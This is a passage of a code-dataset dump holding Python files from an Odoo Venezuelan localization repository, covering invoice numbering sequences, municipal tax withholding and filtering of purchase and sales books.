"alphanum_fraction": 0.5383812189102173,
"avg_line_length": 22.35365867614746,
"blob_id": "46017ead15999dfa2eb194c5809c20f72fade7d0",
"content_id": "b250d6cddfa1d859f016d3012d43923796ca5f8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1915,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 82,
"path": "/fast_rand.h",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "// Stolen from http://www.dimkovic.com/node/22\n\n#include <stdio.h>\n#include <unistd.h>\n#include <string.h>\n#include <fcntl.h>\n#include <errno.h>\n\ntypedef struct fastrand_t {\n \n //\n // MWC1616 data\n \n int a[4];\n int b[4];\n int mask[4];\n int m1[4];\n int m2[4];\n \n //\n // Result (4 32-bit random numbers)\n \n int res[4];\n \n} fastrand;\n\n\nfastrand InitFastRand()\n{\n \n //\n // Initialize MWC1616 masks and multipliers\n // Default values of 18000 and 30903 used\n // for multipliers\n \n fastrand f;\n \n uint8_t i;\n \n for(i=0;i<4;i++) {\n f.mask[i]=0xFFFF;\n f.m1[i]=0x4650;\n f.m2[i]=0x78B7;\n }\n \n f.a[0] = random();\n f.a[1] = random();\n f.a[2] = random();\n f.a[3] = random();\n f.b[0] = random();\n f.b[1] = random();\n f.b[2] = random();\n f.b[3] = random();\n return f;\n}\n\nstatic inline void FastRand(fastrand *f)\n{\n __m128i a = _mm_load_si128((const __m128i *)f->a);\n __m128i b = _mm_load_si128((const __m128i *)f->b);\n \n const __m128i mask = _mm_load_si128((const __m128i *)f->mask);\n const __m128i m1 = _mm_load_si128((const __m128i *)f->m1);\n const __m128i m2 = _mm_load_si128((const __m128i *)f->m2);\n \n __m128i amask = _mm_and_si128(a, mask);\n __m128i ashift = _mm_srli_epi32(a, 0x10);\n __m128i amul = _mm_mullo_epi32(amask, m1);\n __m128i anew = _mm_add_epi32(amul, ashift);\n _mm_store_si128((__m128i *)f->a, anew);\n \n __m128i bmask = _mm_and_si128(b, mask);\n __m128i bshift = _mm_srli_epi32(b, 0x10);\n __m128i bmul = _mm_mullo_epi32(bmask, m2);\n __m128i bnew = _mm_add_epi32(bmul, bshift);\n _mm_store_si128((__m128i *)f->b, bnew);\n \n __m128i bmasknew = _mm_and_si128(bnew, mask);\n __m128i ashiftnew = _mm_slli_epi32(anew, 0x10);\n __m128i res = _mm_add_epi32(ashiftnew, bmasknew);\n _mm_store_si128((__m128i *)f->res, res);\n}\n"
},
{
"alpha_fraction": 0.5660377144813538,
"alphanum_fraction": 0.6037735939025879,
"avg_line_length": 22.1875,
"blob_id": "523529b6f87711e197525571a950995fd4bea4b6",
"content_id": "6a2036da3080ea6e513354f300be34d27cfa6989",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 371,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 16,
"path": "/faster.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <x86intrin.h>\n#include \"fast_rand.h\"\n#include <unistd.h>\n\nint main(){\n\tsrandomdev();\n\tshort* shorts = (short *) malloc(sizeof(short)*10000);\n\tfastrand rand_choice = InitFastRand();\n\tshort * short_res = (short *) rand_choice.res;\n\tfor (int k = 0; k < 1250; k++){\t\n\t\tFastRand(&rand_choice);\n\t\tfor (int i = 0; i < 8; i++){\n\t\t\tprintf(\"%hu\\t\",short_res[i]);\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.5477855205535889,
"alphanum_fraction": 0.559440553188324,
"avg_line_length": 24.235294342041016,
"blob_id": "60bf40f8a7ea5a3f4ca2a371e076106141ae02bb",
"content_id": "0b037252d0d8f1cba9254c7d8250bd5b31d68aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 17,
"path": "/malloc_test.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <stdlib.h>\n#include <stdio.h>\n\nint main(int argc, char **argv){\n if (argc < 2){\n printf(\"Need num_bytes\\n\");\n }\n int num_bytes = atoi(argv[1]);\n printf(\"Reading %d bytes from malloc\\n\",num_bytes);\n unsigned char* result = malloc(num_bytes);\n int sum = 0;\n for (int i = 0; i < num_bytes; i++){\n sum += result[i];\n }\n printf(\"Sum of malloced memory was %d\\n\",sum);\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6749083995819092,
"alphanum_fraction": 0.7298534512519836,
"avg_line_length": 53.599998474121094,
"blob_id": "f8965b2c43032aacf275733d3b585e37d67893de",
"content_id": "73fbe62be2f0e4b6fede2f01073b3bf4bdf22fd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1092,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 20,
"path": "/makefile",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "standard:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -o bio\ndebug:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -D DEBUG=true -o bio\nspeedtest:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast -frename-registers generations.c -msse4.2 -D SPEEDTEST=true -o bio\nunoptimized_speedtest:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -O0 generations.c -msse4.2 -D SPEEDTEST=true -o bio\nspeeddebug:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -D SPEEDTEST=true -g -o bio\nthreaded:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -D THREADED=true -o bio\nthreaded_debug:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -D THREADED=true -D DEBUG=true -o bio\nrand_test:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast -msse4.2 -mrdrnd test_rand_speed.c -o test_rand_speed\nfaster:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast -msse4.2 faster.c -o faster\ninterleaved_speedtest:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 generations.c -o test -Wa,-adhln=test-O3.s -g -fverbose-asm -Ofast -march=native\n"
},
{
"alpha_fraction": 0.5527865886688232,
"alphanum_fraction": 0.6017218232154846,
"avg_line_length": 32.9538459777832,
"blob_id": "b574bc610cd76a5ea0b421f3dfc29ac847b33f7e",
"content_id": "293e5fb29887a793b2e6397d4184dff878da88fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2207,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 65,
"path": "/generations.py",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "# bio_generations\n\n# 45 seconds for (65536,100) = 145k/s\n# 20 seconds for (30000,100) = 152k/s\n# 6.73 seconds for (10000,100) = 148k/s\n# 62 seconds for (5000,300) = 24k/s\n# 208 seconds for (5000,6000) = 144k/s\n# 192 seconds for (3000,7000) = 109k/s\n\nimport random\nimport math\nimport matplotlib.pyplot as plt\nfrom IPython import embed\ndef get_organism():\n return [random.randint(0,1),random.randint(0,1)]\ndef mate(a,b):\n return [random.choice(a),random.choice(b)]\ndef generate_types(num_generations):\n a_a = []\n a_b = []\n b_b = []\n for generation in num_generations:\n a_a_num = 0\n a_b_num = 0\n b_b_num = 0\n for organism in generation:\n if organism == [0,0]:\n a_a_num += 1\n elif organism == [0,1] or organism == [1,0]:\n a_b_num += 1\n else:\n b_b_num += 1\n a_a.append(a_a_num)\n a_b.append(a_b_num)\n b_b.append(b_b_num)\n total = (a_a[0] + b_b[0] + a_b[0])/100\n a_a = [a/total for a in a_a]\n a_b = [a/total for a in a_b]\n b_b = [a/total for a in b_b]\n return a_a,a_b,b_b\ndef backplot(generations=None,others=[]):\n if generations:\n a_a,a_b,b_b = generate_types(generations)\n else:\n a_a,a_b,b_b = others\n line_first, = plt.plot(a_a,label='AA genome')\n line_second, = plt.plot(a_b,label='AB genome or BA genome')\n line_third, = plt.plot(b_b,label='BB genome')\n plt.legend([line_first,line_second,line_third],[\"AA genome\",\"AB or BA genome\",\"BB genome\"])\ndef plot_generations(generations):\n backplot(generations)\n plt.show()\ndef savefig(generations,name):\n backplot(generations)\n plt.savefig(name)\ndef get_generations(num_individuals,num_generations):\n generations = []\n last_gen = [get_organism() for a in range(num_individuals)]\n while len(generations) < num_generations:\n newgen = [mate(random.choice(last_gen),random.choice(last_gen)) for a in range(num_individuals)]\n generations.append(newgen)\n last_gen = newgen\n if len(generations) % 1000 == 0:\n print(\"Currently at generation {0} out of {1}\".format(len(generations),num_generations))\n return generations\n"
}
] | 11 |
18031J0012/Python | https://github.com/18031J0012/Python | 0ae628e1913ff4662b1f15301b07e95ee984e61c | 1df1359b2e4599364f753d0d80b8422ad251b628 | a434c6bc117fd3fbef5459df17e633adfd88ad29 | refs/heads/master | 2020-04-19T09:00:51.688322 | 2019-01-29T07:10:08 | 2019-01-29T07:10:08 | 168,097,235 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5267326831817627,
"alphanum_fraction": 0.5485148429870605,
"avg_line_length": 27.05555534362793,
"blob_id": "f967e84cc4c23b246aae16fa73b44bad53814fea",
"content_id": "a1eea51d1f0c04e05331c395f034da9ebf797ac1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 18,
"path": "/p2/bob_counter.py",
"repo_name": "18031J0012/Python",
"src_encoding": "UTF-8",
"text": "'''Assume s is a string of lower case characters.\n\nWrite a program that prints the number of times the string 'bob' occurs in s. For example, if s = 'azcbobobegghakl', then your program should print\n\nNumber of times bob occurs is: 2'''\n\ndef main():\n s=input()\n s1=s.lower()\n count=0\n for i in range(len(s1)-2):\n if(s1[i]=='b' and s1[i+1]=='o' and s1[i+2]=='b'):\n count = count + 1\n print(count)\n\t\n\nif __name__== \"__main__\":\n\tmain()\n"
},
{
"alpha_fraction": 0.434684693813324,
"alphanum_fraction": 0.45270270109176636,
"avg_line_length": 20.095237731933594,
"blob_id": "b908356124dfda7fc6356476f2b50b9e78e76406",
"content_id": "06c5b14e0d4a7bc0b698cb1fe5d669c2e7012b9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 21,
"path": "/p3/longest_substring.py",
"repo_name": "18031J0012/Python",
"src_encoding": "UTF-8",
"text": "def main():\n s = input()\n # the input string is in s\n # remove pass and start your code here\n maxlen=0\n current=s[0]\n long=s[0]\n \n for i in range(len(s)-1):\n if s[i+1]>=s[i]:\n current+=s[i+1]\n if len(current)>maxlen:\n maxlen=len(current)\n long=current\n else:\n current=s[i+1]\n i+=1\n print(long)\n \nif __name__== \"__main__\":\n main()\n\n"
}
] | 2 |
KhanradCoder/KhanradRadio | https://github.com/KhanradCoder/KhanradRadio | 03ef2249b7d21c76fc71eae7639b42904a330f65 | 8033d2c15f0c4c4a2f82761bcc1ba5ded0737e0a | c2d836b64f2145f36cadee21f751a5a125889bd3 | refs/heads/master | 2021-01-17T12:19:13.154958 | 2015-12-19T15:06:01 | 2015-12-19T15:06:01 | 35,572,469 | 6 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7578740119934082,
"alphanum_fraction": 0.7795275449752808,
"avg_line_length": 22.090909957885742,
"blob_id": "922c42d3bd8f068995c8e1c28a8434d8496b317b",
"content_id": "d3b5072d67d247cc7e94320d22e6656fd4aa65e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 22,
"path": "/README.md",
"repo_name": "KhanradCoder/KhanradRadio",
"src_encoding": "UTF-8",
"text": "# Khanrad Radio\n\nKhanrad Radio uses python to play your music like a radio show. \nYou choose a folder and it randomly selects a song for you. Inbetween songs, Khanrad Radio tells you the weather, time and upcoming songs.\n\nSee Demo Here: https://www.youtube.com/watch?v=PJJM8UeyPSM&list=PLvk-72jrjBFHtvl530CHKjxYeHcxEaV08&index=2\n\nDependencies:\n\npython 2.7,\npynotify,\nespeak,\npywapi,\nmplayer, \n\nThere are many keyboard commands for mplayer:\n\nSPACE : Pause\n\nCTR+C : Change song\n\nARROW : Fast Forward or Rewind\n"
},
{
"alpha_fraction": 0.6590056419372559,
"alphanum_fraction": 0.6674484014511108,
"avg_line_length": 25.649999618530273,
"blob_id": "7c3bb8b9c4719c31665b1b15f7cc0f0c00a4ea48",
"content_id": "ad3d120ac8b2b01d1e6748e1b02bd14b6ef8abee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2132,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 80,
"path": "/radio.py",
"repo_name": "KhanradCoder/KhanradRadio",
"src_encoding": "UTF-8",
"text": "import os, random\nfrom espeak import espeak\nimport time\nfrom datetime import datetime\nimport pywapi\nimport string\nimport pynotify\nimport subprocess\n\nimport commands\ncmd = \"whoami\"\noutput = commands.getoutput(cmd)\n\n\nnow = datetime.now()\ncurTime = now.hour , now.minute\nespeak.synth(\"Welcome to khanrad radio. The time is \"+str(curTime))\ntime.sleep(1.5)\n\nmusic_path = os.path.join(\"/home/\",output,\"Music/\")\n\nespeak.synth(\"Please choose a folder\")\nprint 'Press CTRL+C to change the current song (Terminal)'\nprint os.listdir(music_path)\n\nfolder = raw_input(\"Choose a folder: \")\ntime.sleep(3)\n\ndef rndmp3 ():\n randomfile = random.choice(os.listdir(\"/home/\"+output+\"/Music/\"+folder+\"/\"))\n file = ' /home/'+output+'/Music/'+folder+'/'+ randomfile\n\n pynotify.init( \"Radio\" )\n song = pynotify.Notification('Playing '+randomfile)\n song.show()\n\n espeak.synth('Playing '+randomfile)\n print 'Playing '+randomfile\n time.sleep(1)\n os.system ('mplayer' + file)\n time.sleep(2)\n\nwhile True:\n\n rndmp3()\n\n pynotify.init( \"Radio\" )\n ranNum = random.randrange(0,6)\n\n now = datetime.now()\n curTime = now.hour , now.minute\n\n if ranNum == 1:\n espeak.synth('Thank you for watching khanrad radio')\n time.sleep(1.5)\n mssg = pynotify.Notification('Thank you for watching khanrad radio')\n\n if ranNum == 2:\n espeak.synth(\"The time is \"+str(curTime))\n time.sleep(1.5)\n mssg = pynotify.Notification('The time is '+str(curTime))\n\n if ranNum == 3:\n weather_com_result = pywapi.get_weather_from_weather_com()#IMPORT ZIPCODE HERE\n espeak.synth(\"The weather is \" + string.lower(weather_com_result['current_conditions']['text'])\n + \" at \" +weather_com_result['current_conditions']['temperature']\n + \" degrees celsius \\n\\n\")\n time.sleep(2.5)\n mssg = pynotify.Notification(\"The weather is \" + string.lower(weather_com_result['current_conditions']['text'])\n + \" at \" +weather_com_result['current_conditions']['temperature']\n + \"degrees celsius \\n\\n\")\n\n else:\n print \"Are you enjoying khanrad radio?\"\n\n\n try:\n mssg.show()\n except NameError:\n pass\n"
}
] | 2 |
izzihector/clientes | https://github.com/izzihector/clientes | e6f1c3cb2be1a055b67db101b78b8cd5a05158a7 | 04a572976c5f6567742a2df1d90b14dd76541678 | 7d14b166abb6f3fc43fe0dd2a5628a4be5673d14 | refs/heads/master | 2023-02-11T06:38:47.962447 | 2021-01-08T00:26:07 | 2021-01-08T00:26:07 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5972195267677307,
"alphanum_fraction": 0.6016605496406555,
"avg_line_length": 46.96296310424805,
"blob_id": "c9b8e93d53199e4178484b63bac7135d4a607615",
"content_id": "ef9a1c70b400ad7e1495b8d6abd6ada4f1503154",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5181,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 108,
"path": "/LocalizacionV13/ext_personalizacion_lanta/model/models.py",
"repo_name": "izzihector/clientes",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom odoo import fields, models, api, exceptions, _\nfrom odoo.exceptions import UserError, ValidationError\n\n_logger = logging.getLogger('__name__')\n\n\nclass AccountInherit(models.Model):\n \"\"\"This model add fields need in the invoice for accounting in Venezuela.\"\"\"\n _inherit = 'account.move'\n\n #rif = fields.Char(related='partner_id.vat', string='RIF', store=True)\n \"\"\"rif = fields.Char(compute='_concatena', string='RIF')\n\n @api.depends('partner_id')\n def _concatena(self):\n if self.partner_id.doc_type==\"v\":\n tipo_doc=\"V\"\n if self.partner_id.doc_type==\"e\":\n self.partner_id.doc_type=\"E\"\n if self.partner_id.doc_type==\"g\":\n tipo_doc=\"G\"\n if self.partner_id.doc_type==\"j\":\n tipo_doc=\"J\"\n if self.partner_id.doc_type==\"p\":\n tipo_doc=\"P\"\n if self.partner_id.doc_type==\"c\":\n tipo_doc=\"C\"\n if not self.partner_id.doc_type:\n tipo_doc=\"?\"\n self.rif=str(tipo_doc)+\"-\"+str(self.partner_id.vat)\"\"\"\n\n def funcion_numeracion_fac(self):\n if self.type==\"in_invoice\":\n busca_correlativos = self.env['account.move'].search([('invoice_number','=',self.invoice_number_pro),('id','!=',self.id)])\n for det_corr in busca_correlativos:\n if det_corr.invoice_number:\n raise UserError(_(' El valor :%s ya se uso en otro documento')%det_corr.invoice_number)\n\n busca_correlativos2 = self.env['account.move'].search([('invoice_ctrl_number','=',self.invoice_ctrl_number_pro),('id','!=',self.id)])\n for det_corr2 in busca_correlativos2:\n if det_corr2.invoice_ctrl_number:\n raise UserError(_(' El nro de control :%s ya se uso en otro documento')%det_corr2.invoice_ctrl_number)\n \n self.invoice_number=self.invoice_number_pro\n self.invoice_ctrl_number=self.invoice_ctrl_number_pro\n partners='pro' # aqui si es un proveedor\n\n if self.type==\"in_refund\" or self.type==\"in_receipt\":\n busca_correlativos = self.env['account.move'].search([('invoice_number','=',self.refuld_number_pro),('id','!=',self.id)])\n for det_corr in busca_correlativos:\n if det_corr.invoice_number:\n raise UserError(_(' El valor :%s ya se uso en otro documento')%det_corr.invoice_number)\n\n busca_correlativos2 = self.env['account.move'].search([('invoice_ctrl_number','=',self.refund_ctrl_number_pro),('id','!=',self.id)])\n for det_corr2 in busca_correlativos2:\n if det_corr2.invoice_ctrl_number:\n raise UserError(_(' El nro de control :%s ya se uso en otro documento')%det_corr2.invoice_ctrl_number)\n \n self.invoice_number=self.refuld_number_pro\n self.invoice_ctrl_number=self.refund_ctrl_number_pro\n partners='cli' # aqui si es un cliente\n\n if self.type==\"out_invoice\":\n self.invoice_number_cli=self.get_invoice_number_cli()\n self.invoice_number=self.invoice_number_cli #self.get_invoice_number_cli()\n self.invoice_ctrl_number_cli=self.get_invoice_ctrl_number_unico()\n self.invoice_ctrl_number=self.invoice_ctrl_number_cli #self.get_invoice_ctrl_number_cli()\n\n if self.type==\"out_refund\":\n self.refuld_number_cli=self.get_refuld_number_cli()\n self.invoice_number=self.refuld_number_cli #self.get_refuld_number_cli()\n self.refund_ctrl_number_cli=self.get_invoice_ctrl_number_unico()\n self.invoice_ctrl_number=self.refund_ctrl_number_cli #self.get_refuld_ctrl_number_cli()\n\n if self.type==\"out_receipt\":\n self.refuld_number_cli=self.get_refuld_number_pro()\n self.invoice_number=self.refuld_number_cli #self.get_refuld_number_cli()\n self.refund_ctrl_number_cli=self.get_invoice_ctrl_number_unico()\n self.invoice_ctrl_number=self.refund_ctrl_number_cli #self.get_refuld_ctrl_number_cli()\n #self.invoice_number=self.get_nro_cliente()\n\n def get_invoice_ctrl_number_unico(self):\n '''metodo que crea el Nombre del asiento contable si la secuencia no esta creada, crea una con el\n nombre: 'l10n_ve_cuenta_retencion_iva'''\n\n self.ensure_one()\n SEQUENCE_CODE = 'l10n_ve_nro_control_unico_formato_libre'\n company_id = 1\n IrSequence = self.env['ir.sequence'].with_context(force_company=1)\n name = IrSequence.next_by_code(SEQUENCE_CODE)\n\n # si aún no existe una secuencia para esta empresa, cree una\n if not name:\n IrSequence.sudo().create({\n 'prefix': '00-',\n 'name': 'Localización Venezolana nro control Unico Factura Forma Libre %s' % 1,\n 'code': SEQUENCE_CODE,\n 'implementation': 'no_gap',\n 'padding': 4,\n 'number_increment': 1,\n 'company_id': 1,\n })\n name = IrSequence.next_by_code(SEQUENCE_CODE)\n #self.invoice_number_cli=name\n return name"
},
{
"alpha_fraction": 0.5652835965156555,
"alphanum_fraction": 0.5677579045295715,
"avg_line_length": 37.59558868408203,
"blob_id": "6845586ea9987fe7d4cbc31a4911648b69d625e8",
"content_id": "51eb856f578c976ff11120eb45d63e45b7db6181",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5254,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 136,
"path": "/LocalizacionV13/municipality_tax/models/account_move.py",
"repo_name": "izzihector/clientes",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom odoo import api, fields, models, _ \nfrom odoo.exceptions import UserError, ValidationError\n\n_logger = logging.getLogger('__name__')\n\n\n\n\nclass AccountMoveLine(models.Model):\n _inherit = \"account.move.line\"\n\n\n\n concept_id = fields.Many2one('muni.wh.concept', string='Municipal Tax')\n\n\n def _check_balanced(self):\n ''' Assert the move is fully balanced debit = credit.\n An error is raised if it's not the case.\n '''\n moves = self.filtered(lambda move: move.line_ids)\n if not moves:\n return\n\n # /!\\ As this method is called in create / write, we can't make the assumption the computed stored fields\n # are already done. Then, this query MUST NOT depend of computed stored fields (e.g. balance).\n # It happens as the ORM makes the create with the 'no_recompute' statement.\n self.env['account.move.line'].flush(['debit', 'credit', 'move_id'])\n self.env['account.move'].flush(['journal_id'])\n self._cr.execute('''\n SELECT line.move_id, ROUND(SUM(debit - credit), currency.decimal_places)\n FROM account_move_line line\n JOIN account_move move ON move.id = line.move_id\n JOIN account_journal journal ON journal.id = move.journal_id\n JOIN res_company company ON company.id = journal.company_id\n JOIN res_currency currency ON currency.id = company.currency_id\n WHERE line.move_id IN %s\n GROUP BY line.move_id, currency.decimal_places\n HAVING ROUND(SUM(debit - credit), currency.decimal_places) != 0.0;\n ''', [tuple(self.ids)])\n\n query_res = self._cr.fetchall()\n if query_res:\n ids = [res[0] for res in query_res]\n sums = [res[1] for res in query_res]\n\n\n\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n\n wh_muni_id = fields.Many2one('municipality.tax', string='Withholding municipal tax', readonly=True, copy=False)\n\n\n def _create_muni_wh_voucher(self):\n\n vals = {}\n values = {}\n muni_wh = self.env['municipality.tax']\n muni_wh_line = self.env['account.move.line']\n _logger.info(\"\"\"\\n\\n\\n Hola se esta ejecutando el action_post de la retencion municipal\\n\\n\\n\"\"\")\n # _logger.info(\"\"\"\\n\\n\\n\\n invoice %s \\n\\n\\n\"\"\", invoice)\n # se crea el registro del modelo municipality.tax.line\n res = []\n for item in self.invoice_line_ids:\n # codigo darrell\n base_impuesto=item.price_subtotal\n impuesto_mun=item.concept_id.aliquot\n # fin codigo darrell\n #raise UserError(_('impuesto_mun= %s')%impuesto_mun)\n if item.concept_id.aliquot>0:\n res.append((0,0, {\n 'code': item.concept_id.code,\n 'aliquot': item.concept_id.aliquot,\n 'concept_id': item.concept_id.id,\n #'base_tax': self.amount_untaxed,\n 'base_tax': base_impuesto, # correcion darrell\n 'invoice_id': self.id,\n 'invoice_date' : self.date,\n 'invoice_number': self.invoice_number,\n 'invoice_ctrl_number': self.invoice_ctrl_number,\n #'type':self.type, # nuevo darrell\n }))\n _logger.info(\"\\n\\n\\n res %s \\n\\n\\n\\n\", res)\n # Se crea el registro de la retencion\n vals = {\n 'partner_id': self.partner_id.id,\n 'rif': self.partner_id.vat,\n 'invoice_id': self.id,\n 'act_code_ids': res,\n #'type':self.type,\n }\n _logger.info(\"\\n\\n\\n vals %s \\n\\n\\n\", vals)\n muni_tax = muni_wh.create(vals)\n _logger.info(\"\\n\\n\\n muni %s\\n\\n\\n\", muni_tax)\n self.write({'wh_muni_id': muni_tax.id})\n #raise UserError(_('cuentas = %s')%self.write({'wh_muni_id': muni_tax.id}))\n\n def actualiza_voucher_wh(self):\n #raise UserError(_('mama = %s')%self)\n cursor_municipality = self.env['municipality.tax'].search([('id','=',self.wh_muni_id.id)])\n for det in cursor_municipality:\n self.env['municipality.tax'].browse(det.id).write({\n 'type': self.type,\n })\n\n\n def action_post(self):\n \"\"\"This function create municital retention voucher too.\"\"\"\n invoice = super().action_post()\n # es agente de retencion municipal\n _logger.info(\"\\n\\n\\n\\n action_post de Impuestos municipales \\n\\n\\n\\n\")\n \n if self.partner_id.muni_wh_agent==True or self.company_id.partner_id.muni_wh_agent==True:\n # si no existe una retencion ya\n bann=0\n bann=self.verifica_exento_muni()\n if bann>0:\n if not self.wh_muni_id:\n self._create_muni_wh_voucher()\n self.actualiza_voucher_wh()\n return invoice\n\n def verifica_exento_muni(self):\n acum=0\n #raise UserError(_('self = %s')%self.id)\n puntero_move_line = self.env['account.move.line'].search([('move_id','=',self.id)])\n for det_puntero in puntero_move_line:\n acum=acum+det_puntero.concept_id.aliquot\n return acum\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.49419301748275757,
"alphanum_fraction": 0.49559471011161804,
"avg_line_length": 45.25,
"blob_id": "6527c0cb260b737c13c82ce13b27f1a126a1e04c",
"content_id": "72233c4d12a533801acad0a2e40fbc246936d20a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4994,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 108,
"path": "/LocalizacionV13/libros_filtros/model/mymodules.py",
"repo_name": "izzihector/clientes",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, api, exceptions\nimport logging\nfrom odoo.exceptions import UserError\n\n\nclass AccountBankSatatement(models.Model):\n\t_inherit = \"account.bank.statement.line\"\n\tvalidador = fields.Boolean(value=False)\n\n\n\nclass AccountBankStatementLine(models.Model):\n\n\t_inherit = \"account.move\"\n\t_decription = \"Filtra las facturas que no aparescan en los libros\"\n\n\tocultar_libros = fields.Boolean(defaul=False, value=False)\n\n\nclass libro_compras(models.TransientModel):\n _inherit = \"account.wizard.libro.compras\"\n\n def get_invoice(self):\n self.facturas_ids = self.env['account.move'].search([\n ('invoice_date','>=',self.date_from),\n ('invoice_date','<=',self.date_to),\n ('ocultar_libros','!=','True'),\n ('state','in',('posted','cancel' )),\n ('type','in',('in_invoice','in_refund','in_receipt'))\n ],order=\"invoice_date asc\")\n temp = self.env['account.wizard.pdf.compras'].search([])\n\n for t in temp:\n t.unlink()\n\n for factura in self.facturas_ids :\n for line in factura.invoice_line_ids:\n for tax in line.tax_ids:\n if tax.aliquot:\n self.env['account.wizard.pdf.compras'].create({\n 'name':factura.invoice_date,\n 'document': factura.partner_id.vat,\n 'partner':factura.partner_id.id,\n 'invoice_number': factura.invoice_number,#darrell\n 'tipo_doc': factura.journal_id.tipo_doc,\n 'invoice_ctrl_number': factura.invoice_ctrl_number,\n 'sale_total': line.price_total,\n 'base_imponible': line.price_subtotal,\n 'iva' : line.price_subtotal * (tax.amount / 100),\n 'state_retantion': factura.vat_ret_id.state,\n 'iva_retenido': factura.vat_ret_id.vat_retentioned,\n 'retenido': factura.vat_ret_id.name,\n 'retenido_date':factura.vat_ret_id.voucher_delivery_date,\n 'alicuota':tax.description,\n 'alicuota_type': tax.aliquot,\n 'state': factura.state,\n 'reversed_entry_id':factura.id,\n 'import_form_num':factura.import_form_num,\n 'import_dossier':factura.import_dossier,\n 'import_date': factura.import_date,\n 'ref':factura.ref,\n })\n self.line = self.env['account.wizard.pdf.compras'].search([],order=\"name desc\")\n pass\n\nclass libro_ventas(models.TransientModel):\n _inherit = \"account.wizard.libro.ventas\"\n\n def get_invoice(self):\n self.facturas_ids = self.env['account.move'].search([\n ('invoice_date','>=',self.date_from),\n ('invoice_date','<=',self.date_to),\n ('ocultar_libros','!=','True'),\n ('state','in',('posted','cancel' )),\n ('type','in',('out_invoice','out_refund','out_receipt'))\n ])\n temp = self.env['account.wizard.pdf.ventas'].search([])\n\n for t in temp:\n t.unlink()\n for factura in self.facturas_ids :\n for line in factura.invoice_line_ids:\n for tax in line.tax_ids:\n if tax.aliquot:\n self.env['account.wizard.pdf.ventas'].create({\n 'name':factura.invoice_date,\n 'document': factura.partner_id.vat,\n 'partner':factura.partner_id.id,\n 'invoice_number': factura.invoice_number,#darrell\n 'tipo_doc': factura.journal_id.tipo_doc,\n 'invoice_ctrl_number': factura.invoice_ctrl_number,\n 'sale_total': line.price_total,\n 'base_imponible': line.price_subtotal,\n 'iva' : line.price_subtotal * (tax.amount / 100),\n 'iva_retenido': factura.vat_ret_id.vat_retentioned,\n 'retenido': factura.vat_ret_id.name,\n 'state_retantion': factura.vat_ret_id.state,\n 'retenido_date':factura.vat_ret_id.voucher_delivery_date,\n 'alicuota':tax.description,\n 'alicuota_type': tax.aliquot,\n 'state': factura.state,\n 'reversed_entry_id':factura.reversed_entry_id.id,\n 'currency_id':factura.currency_id.id,\n 'ref':factura.ref,\n })\n self.line = self.env['account.wizard.pdf.ventas'].search([])"
},
{
"alpha_fraction": 0.5399218201637268,
"alphanum_fraction": 0.5421552062034607,
"avg_line_length": 28.37704849243164,
"blob_id": "bd0cd06974eb8f548d3eeebda47d18a35ab081e4",
"content_id": "8d6379f25118acd9d8e66894b3ba41add34c86c8",
"detected_licenses": [],
"is_generated": false,
